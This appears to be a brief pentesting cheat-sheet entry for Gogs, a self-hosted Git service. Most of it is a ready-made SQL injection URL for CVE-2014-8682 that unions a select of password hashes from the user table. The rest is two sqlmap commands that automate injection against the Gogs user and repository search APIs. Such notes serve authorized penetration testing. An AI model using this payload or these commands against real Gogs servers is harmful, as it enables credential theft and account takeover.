Gogs Pentesting
Last modified: 2023-03-18
Gogs (Go Git Service) is a painless self-hosted Git Service.
SQL injection (CVE-2014-8682)
http://127.0.0.1:3000/api/v1/users/search?q=')/**/union/**/all/**/select/**/1,1,(select/**/passwd/**/from/**/user),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--
Automation
sqlmap -u "https://example.com/api/v1/repos/search?q=test"
sqlmap -u "https://example.com/api/v1/users/search?q=test"